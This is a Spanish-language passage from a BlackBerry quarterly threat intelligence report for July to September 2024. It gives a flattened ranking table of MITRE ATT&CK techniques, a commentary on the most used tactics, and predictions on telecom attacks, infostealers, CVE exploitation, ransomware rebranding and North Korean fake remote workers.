Defensa Evasión, Descubrimiento
Descubrimiento de información del sistema
Descubrimiento
Captura de entrada
Acceso a credenciales, recogida
Descubrimiento de software
Descubrimiento
Descubrimiento de software de seguridad
Descubrimiento
Tarea/trabajo programado
Ejecución, persistencia, escalada de privilegios
Secuestro de órdenes de búsqueda DLL
Persistencia, escalada de privilegios, evasión de defensas
Inyección de procesos
Evasión de la defensa, escalada de privilegios
Enmascaramiento
Defensa Evasión
Descubrimiento de procesos
Descubrimiento
Crear o modificar un proceso del sistema
Persistencia, escalada de privilegios
Servicio Windows
Persistencia, escalada de privilegios
Ejecución de arranque o inicio de sesión automático
Persistencia, escalada de privilegios
Claves de ejecución del registro/Carpeta de inicio
Persistencia, escalada de privilegios
Descubrimiento de archivos y directorios
Descubrimiento
Descubrimiento remoto del sistema
Descubrimiento
Intérprete de comandos y secuencias de comandos
Ejecución
Deteriorar las defensas
Defensa Evasión
Último informe
Flujo de ejecución del secuestro
1
Carga lateral de DLL
2
Virtualización/
Evasión del Sandbox
NA
Descubrimiento de información del sistema
5
Captura de entrada
4
Descubrimiento de software
6
Descubrimiento de software de seguridad
7
Tarea/trabajo programado
19
Secuestro de órdenes de búsqueda DLL
NA
Inyección de procesos
3
Enmascaramiento
10
Descubrimiento de procesos
8
Crear o modificar un proceso del sistema
NA
Servicio Windows
NA
Ejecución de arranque o inicio de sesión automático
14
Claves de ejecución del registro/Carpeta de inicio
15
Descubrimiento de archivos y directorios
9
Descubrimiento remoto del sistema
13
Intérprete de comandos y secuencias de comandos
NA
Deteriorar las defensas
17
Cambia
Flujo de ejecución del secuestro
=
Carga lateral de DLL
=
Virtualización/
Evasión del Sandbox
Descubrimiento de información del sistema
Captura de entrada
Descubrimiento de software
=
Descubrimiento de software de seguridad
=
Tarea/trabajo programado
Secuestro de órdenes de búsqueda DLL
Inyección de procesos
Enmascaramiento
Descubrimiento de procesos
Crear o modificar un proceso del sistema
Servicio Windows
Ejecución de arranque o inicio de sesión automático
Claves de ejecución del registro/Carpeta de inicio
Descubrimiento de archivos y directorios
Descubrimiento remoto del sistema
Intérprete de comandos y secuencias de comandos
Deteriorar las defensas

Principales técnicas adversarias

Este trimestre, el secuestro del flujo de ejecución (T1574) se convirtió en la técnica más utilizada por los delincuentes, mientras que su subtécnica, la carga lateral de DLL (T1574.002), ocupó el segundo lugar. Estos métodos consisten en que los atacantes manipulan la forma en que los sistemas operativos ejecutan los programas, por ejemplo mediante la carga lateral de DLL, a menudo para eludir los sistemas de seguridad.

Además, cabe destacar el ascenso de la técnica Virtualization/Sandbox Evasion (T1497) a los tres primeros puestos. Esto sugiere que el malware empleado por los atacantes tenía un fuerte enfoque antidetección, como indican los binarios estudiados para llegar a estas conclusiones.

Tácticas detectadas

En este trimestre, las tres tácticas principales son la Evasión de la Defensa, la Escalada de Privilegios y la Persistencia, como se muestra en la Figura 20.

 

Figura 20: Tácticas ATT&CK de MITRE, junio - septiembre de 2024

De cara al futuro

Este informe de 90 días, que abarca de julio a septiembre de 2024, está diseñado para ayudarle a mantenerse informado y preparado ante futuras amenazas. Los grupos delictivos de alto perfil, especialmente los operadores de ransomware, están explotando nuevas vulnerabilidades y encontrando valor en objetivos tanto grandes como pequeños. Como señala el informe, los investigadores de BlackBerry observaron casi dos millones de ataques detenidos sólo este trimestre. Este nivel de actividad hace que sea crucial mantenerse al día de las últimas noticias de seguridad para su sector y región.

Esto es lo que cabe esperar en los próximos meses:

Telecomunicaciones asediadas

El sector de las telecomunicaciones se convirtió en un objetivo prioritario en 2024, como demuestra la brecha de AT&T, que puso en peligro los registros de llamadas y mensajes de texto de toda su red. A medida que avanzamos hacia 2025, esperamos que los agresores se dirijan cada vez más a la infraestructura de telecomunicaciones en lugar de a dispositivos individuales, lo que les permitirá interceptar comunicaciones a gran escala. El incidente de Salt Typhoon demostró cómo actores sofisticados pueden explotar vulnerabilidades a nivel de red para eludir las medidas de seguridad tradicionales. Este cambio del malware específico de un dispositivo a los ataques a nivel de infraestructura presenta un desafío crítico, ya que las organizaciones deben ahora replantearse su enfoque para proteger las comunicaciones sensibles a través de las redes públicas de telecomunicaciones.

Infosalvadores y datos robados en los mercados negros

A lo largo de 2024, los infosecuestradores han predominado en nuestros informes trimestrales sobre amenazas. Los infosecuestradores más conocidos han ocupado a menudo los primeros puestos de nuestras listas de principales amenazas y han aparecido en numerosas ocasiones en ataques en todo el mundo. Según la Interpol, en 2023 se produjo un aumento del 40% en las ventas en la Web oscura de registros recogidos de infostealers. De cara a 2025, se espera que aumente.

Parches y explotación

La explotación de vulnerabilidades no reveladas o recién descubiertas por parte de los actores de amenazas, en particular las bandas de ransomware, no es un fenómeno nuevo. Sin embargo, el ritmo al que se explotan estos CVE ha hecho que a los profesionales de TI les resulte cada vez más difícil seguir el ritmo. Esto es especialmente cierto en nuestro mundo hiperconectado, con sus innumerables procesos, aplicaciones y servicios. Los ciberdelincuentes son conscientes de ello y buscan activamente explotar cualquier debilidad en la infraestructura y seguridad de TI de una empresa para obtener beneficios.

Durante este periodo, más del 50% de todos los nuevos CVE obtuvieron una puntuación superior a 7,0. Se espera que la rápida explotación de los CVE y la militarización de las pruebas de concepto (PoC ) sigan siendo retos importantes para el sector en el nuevo año.

Rebranding y resurgimiento del ransomware

Durante las últimas décadas, las fuerzas de seguridad y los profesionales de la ciberseguridad han estado jugando al gato y al ratón con los desarrolladores y afiliados de ransomware. Sin embargo, como mencionamos en nuestra sección sobre el ransomware Lynx, la mayoría de los grupos son amalgamas de otros, a menudo cambiando de marca y utilizando otro código de ransomware o comprando bases de código malicioso de otros autores de malware. Esta tendencia de cambio de marca, resurgimiento y reutilización del ransomware probablemente continuará, ya que la barrera de entrada en el espacio de la ciberdelincuencia disminuye constantemente.

Trabajadores a distancia norcoreanos y falsas identidades

Al parecer, espías norcoreanos intentaron infiltrarse en empresas occidentales de TI haciéndose pasar por trabajadores a distancia. Estos ciberdelincuentes elaboraban cuidadosamente identidades falsas, demostraban los conocimientos necesarios para superar entrevistas de trabajo y pruebas, y enmascaraban su geolocalización para evitar aparecer como norcoreanos. En algunos casos, utilizaban tecnología deepfake. Una vez contratados, intentaban filtrar datos internos e instalar utilidades de acceso remoto.

Predecimos que esta tendencia a falsificar identidades para infiltrarse en organizaciones continuará en 2025. Es probable que Corea del Norte haya desplegado más de estos operativos encubiertos que aún no han sido descubiertos y que probablemente evolucionen sus tácticas para eludir mejor la detección.

Visite el blog de BlackBerry para estar al día de la evolución de las amenazas y defensas de ciberseguridad.

Aviso legal

La información contenida en el informe BlackBerry Global Threat Intelligence Report tiene únicamente fines informativos. BlackBerry no garantiza ni se responsabiliza de la exactitud, integridad y fiabilidad de las declaraciones o investigaciones de terceros a las que se hace referencia en el presente documento. El análisis expresado en este informe refleja el conocimiento actual de la información disponible por parte de nuestros analistas de investigación y puede estar sujeto a cambios a medida que tengamos conocimiento de información adicional. Los lectores son responsables de actuar con la debida diligencia a la hora de aplicar esta información a su vida privada y profesional. BlackBerry no aprueba ningún uso malintencionado o indebido de la información presentada en este informe.